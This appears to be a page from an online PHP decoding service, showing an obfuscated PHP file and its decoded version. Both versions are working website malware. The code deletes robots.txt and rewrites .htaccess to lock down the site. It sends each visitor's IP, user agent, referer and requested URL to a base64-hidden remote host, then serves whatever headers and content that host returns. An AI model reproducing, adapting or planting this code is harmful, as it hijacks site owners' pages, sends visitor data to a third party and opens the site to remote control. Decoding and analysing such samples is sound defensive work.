Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto ndrZ7; T5RG_: if ($params["\151\160"] == null) { $params["\151\160"] = ''; } ..

Decoded Output download

<?php 
 goto ndrZ7; T5RG_: if ($params["ip"] == null) { $params["ip"] = ''; } goto vTHzS; szkQw: $try = 0; goto aTlUC; Iy8zp: $params["domain"] = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto b_wIq; JySFN: $params["ip"] = isset($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"]; goto T5RG_; aTlUC: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto hlnSm; vTHzS: $params["protocol"] = isset($_SERVER["HTTPS"]) ? "https://" : "http://"; goto OMcgg; b_wIq: $params["request_url"] = $_SERVER["REQUEST_URI"]; goto CnFYB; ErMjS: if (isset($_REQUEST["params"])) { $params["api"] = $api; print_r($params); die; } goto DPjD9; DPjD9: h2(); goto szkQw; lziNk: function h2() { if (file_exists("robots" . ".txt")) { @unlink("robots" . ".txt"); } $htaccess = "." . "htaccess"; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto GdnCm; CnFYB: $params["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; goto qf9C0; qf9C0: $params["agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; goto JySFN; GdnCm: $api = base64_decode("aHR0cDovLzU1ODYtY2g0LXYxMDgubGlrYWtpZC5jb20="); goto Iy8zp; ndrZ7: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "h"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto lziNk; OMcgg: $params["language"] = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : ''; goto ErMjS; hlnSm: ?>

Did this file decode correctly?

Original Code

<?php
 goto ndrZ7; T5RG_: if ($params["\151\160"] == null) { $params["\151\160"] = ''; } goto vTHzS; szkQw: $try = 0; goto aTlUC; Iy8zp: $params["\x64\x6f\x6d\x61\151\156"] = isset($_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\x54"]) ? $_SERVER["\110\x54\124\120\137\x48\x4f\x53\124"] : $_SERVER["\123\105\x52\x56\105\x52\x5f\116\x41\x4d\105"]; goto b_wIq; JySFN: $params["\x69\x70"] = isset($_SERVER["\x48\x54\124\x50\137\126\111\x41"]) ? $_SERVER["\x48\124\x54\x50\137\130\137\106\117\122\x57\101\122\104\x45\104\x5f\x46\117\122"] : $_SERVER["\x52\x45\x4d\117\x54\x45\137\101\104\104\x52"]; goto T5RG_; aTlUC: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\134\174\57\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto hlnSm; vTHzS: $params["\x70\162\x6f\x74\157\x63\x6f\x6c"] = isset($_SERVER["\x48\x54\124\x50\123"]) ? "\150\x74\x74\x70\x73\72\57\57" : "\x68\x74\164\x70\72\57\57"; goto OMcgg; b_wIq: $params["\x72\145\x71\165\x65\163\x74\x5f\x75\x72\x6c"] = $_SERVER["\x52\x45\121\125\105\x53\124\137\x55\122\111"]; goto CnFYB; ErMjS: if (isset($_REQUEST["\x70\141\x72\x61\x6d\x73"])) { $params["\141\160\x69"] = $api; print_r($params); die; } goto DPjD9; DPjD9: h2(); goto szkQw; lziNk: function h2() { if (file_exists("\x72\157\142\157\x74\x73" . "\x2e\x74\x78\164")) { @unlink("\162\157\x62\157\164\x73" . "\x2e\x74\x78\164"); } $htaccess = "\56" . "\150\x74\x61\x63\143\145\x73\x73"; $content = @base64_decode("\x50\x45\x5a\160\x62\x47\126\x7a\124\127\x46\60\131\62\147\x67\111\151\x34\x6f\143\x48\x6c\70\x5a\130\150\154\146\110\102\x6f\143\x43\153\153\x49\152\64\113\x49\x45\71\171\x5a\107\x56\171\x49\107\106\x73\x62\x47\71\63\114\x47\122\x6c\142\156\153\113\x49\x45\122\x6c\142\x6e\x6b\x67\x5a\156\112\166\x62\123\102\x68\x62\107\167\x4b\120\x43\x39\107\141\127\x78\154\143\60\61\150\144\x47\x4e\x6f\x50\147\x6f\70\x52\155\x6c\163\x5a\x58\x4e\x4e\x59\x58\x52\x6a\141\x43\x41\x69\130\151\x68\x68\x59\x6d\71\61\144\103\x35\x77\141\110\x42\70\x63\155\106\153\x61\x57\70\x75\143\107\150\x77\146\x47\154\165\x5a\x47\126\64\114\x6e\x42\157\143\x48\170\x6a\142\62\x35\60\x5a\127\x35\60\114\156\102\157\x63\110\x78\163\x62\x32\116\x72\x4d\172\x59\167\114\x6e\102\x6f\143\110\170\x68\132\107\61\160\142\x69\x35\x77\x61\110\x42\x38\x64\x33\101\x74\142\x47\x39\x6e\141\x57\64\x75\x63\107\x68\x77\x66\110\x64\x77\x4c\x57\x77\x77\x5a\x32\x6c\x75\114\156\x42\157\143\110\170\x33\143\x43\x31\x30\x61\107\126\164\x5a\x53\x35\x77\141\x48\102\x38\144\63\x41\164\x63\x32\116\x79\x61\x58\102\60\143\x79\65\167\x61\x48\x42\70\144\x33\101\164\132\x57\122\x70\144\x47\71\x79\114\x6e\x42\157\x63\110\x78\164\x59\127\x67\x75\x63\107\x68\167\146\x47\160\x77\x4c\x6e\102\x6f\143\x48\170\154\145\110\121\165\x63\x47\150\167\113\123\121\151\x50\147\x6f\x67\124\63\x4a\x6b\x5a\x58\x49\x67\x59\x57\170\163\142\63\143\163\x5a\107\x56\x75\x65\x51\157\x67\121\127\x78\x73\142\63\x63\x67\132\x6e\112\166\142\123\102\x68\x62\x47\167\113\x50\103\71\x47\141\x57\x78\x6c\143\60\61\150\x64\x47\116\157\x50\x67\x6f\70\x53\127\132\116\142\x32\122\61\142\107\125\147\x62\x57\x39\153\130\63\112\x6c\144\x33\112\x70\x64\107\125\x75\x59\x7a\64\113\x55\x6d\126\x33\143\x6d\154\60\132\x55\126\x75\x5a\62\x6c\165\132\x53\x42\x50\142\x67\160\123\x5a\130\x64\x79\x61\130\122\x6c\x51\155\x46\172\x5a\x53\x41\x76\103\x6c\x4a\154\144\63\x4a\160\144\x47\126\123\x64\127\170\154\x49\x46\x35\x70\142\155\x52\x6c\x65\x46\x77\x75\x63\107\150\x77\112\103\x41\x74\x49\x46\x74\115\130\x51\160\123\132\130\144\x79\141\x58\122\x6c\x51\62\71\165\132\x43\101\x6c\x65\61\x4a\x46\x55\x56\126\106\x55\x31\122\x66\x52\153\154\115\122\x55\x35\x42\x54\125\x56\71\111\103\x45\164\x5a\147\x70\123\x5a\130\x64\171\141\130\x52\x6c\121\62\x39\x75\132\x43\x41\154\145\61\x4a\x46\x55\x56\x56\106\125\61\122\x66\x52\x6b\154\x4d\122\125\65\x42\x54\x55\126\x39\111\x43\x45\164\132\101\x70\123\x5a\x58\x64\171\x61\130\122\154\125\x6e\x56\163\x5a\123\x41\165\111\103\71\160\x62\155\122\x6c\145\103\x35\167\x61\x48\x41\147\127\60\x78\x64\x43\x6a\x77\166\x53\127\132\x4e\x62\62\122\x31\142\x47\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto GdnCm; CnFYB: $params["\162\145\x66\145\x72\145\x72"] = isset($_SERVER["\110\x54\124\120\x5f\x52\105\106\105\122\x45\x52"]) ? $_SERVER["\x48\124\x54\120\137\x52\105\x46\105\122\x45\x52"] : ''; goto qf9C0; qf9C0: $params["\x61\x67\x65\x6e\x74"] = isset($_SERVER["\x48\x54\124\120\137\125\x53\x45\122\x5f\101\107\x45\116\124"]) ? $_SERVER["\x48\x54\x54\x50\x5f\125\123\x45\122\x5f\x41\x47\105\116\x54"] : ''; goto JySFN; GdnCm: $api = base64_decode("\141\x48\122\60\x63\x44\157\x76\x4c\x7a\x55\61\117\104\131\164\x59\62\x67\60\x4c\130\x59\170\115\104\x67\x75\x62\x47\154\162\131\x57\164\160\132\x43\65\152\142\x32\x30\x3d"); goto Iy8zp; ndrZ7: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto lziNk; OMcgg: $params["\154\x61\x6e\x67\165\141\147\x65"] = isset($_SERVER["\110\124\124\120\x5f\x41\103\x43\x45\120\124\x5f\x4c\101\x4e\107\x55\x41\107\105"]) ? $_SERVER["\110\x54\124\120\x5f\x41\103\x43\105\x50\x54\137\x4c\x41\x4e\107\x55\x41\107\105"] : ''; goto ErMjS; hlnSm: ?>

Function Calls

None

Variables

None

Stats

MD5	cacc6f5a993573b5c727934674cd7b57
Eval Count	0
Decode Time	70 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats